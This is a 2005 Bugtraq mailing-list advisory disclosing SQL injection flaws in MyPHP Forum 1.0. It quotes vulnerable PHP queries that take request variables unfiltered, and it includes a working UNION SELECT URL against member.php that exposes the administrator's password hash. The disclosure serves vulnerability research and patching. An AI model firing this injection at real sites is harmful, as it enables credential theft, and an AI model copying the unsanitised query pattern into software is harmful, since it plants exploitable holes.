[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20050209081714.15780.qmail@www.securityfocus.com>
Date: 9 Feb 2005 08:17:14 -0000
From: foster GHC <foster@....ru>
To: bugtraq@...urityfocus.com
Subject: Several SQL injection bugs in myPHP Forum v.1.0
/*==========================================*/
// GHC -> MyPHP Forum <- ADVISORY
// Product: MyPHP Forum
// Version: 1.0
// URL: http://www.myphp.ws
// VULNERABILITY CLASS: SQL injection
/*==========================================*/
[Product Description]
MyPHP Forum is a simple message board script with limited features.
[Summary]
Several SQL Injection vulnerabilities may lead to viewing of sensetive information,
including hash of user's password.
[Details]
Positive part of user outbound variables used as they are in SQL queries.
[1] script name: forum.php
---[code]---
$query = mysql_query("SELECT fid, name FROM $db_forum WHERE fid='$fid'") or die(mysql_error());
$nav = mysql_fetch_array($query);
---[/code]---
Possible SQL injection through $fid variable that has no filtration.
[2] script name: member.php
---[code]---
if($action == "viewpro") {
$member = $HTTP_GET_VARS['member'];
$sql = "SELECT * FROM $db_member WHERE username='$member'";
$query = mysql_query("SELECT * FROM $db_member WHERE username='$member'") or die("cant execute $sql");
$member = mysql_fetch_array($query);
---[/code]---
SQL code injection
member.php?action=viewpro&member=[SQL code]
[example of exploit]
member.php?action=viewpro&member=nonexist' UNION SELECT uid, username, password, status, email, website, aim, msn, location, sig, regdate, posts, password as yahoo FROM nb_member WHERE uid='1
will show administrator's name and password hash (in the "Yahoo" field).
Password cripted by encrypt() function:
-[code]-
function encrypt($string) {
$crypted = crypt(md5($string), md5($string));
return $crypted;
}
-[/code]-
[3] script name: forgot.php
---[code]---
$email = $_REQUEST['email'];
if (isset($email)) {
$sql="SELECT * FROM $db_member WHERE email='$email'";
...
$result = mysql_query("SELECT username FROM $db_member WHERE email='$email'");
$username = mysql_result($result, 0);
$msg = "
Hello $username,
---[code]---
$email variable has no filtration.
IMPACT: Possible SQL injection through this variable.
[4] script name: include.php
This is the most important script that is the part of all others.
$nbuser & $nbpass variables are not filtering.
---[code]---
$query = mysql_query("SELECT * FROM $db_member WHERE username='$nbuser'")
---[/code]---
IMPACT: possible SQL injection through $nbuser.
P.S. all bugs are actual for magic_quotes_gpc=0.
/* ================================================== */
/* www.ghc.ru -- security games & challenges */
/* ================================================== */
/* greets to: RST.void.ru, D0G4 & all quest hunters %)*/
/* ================================================== */
Powered by blists - more mailing lists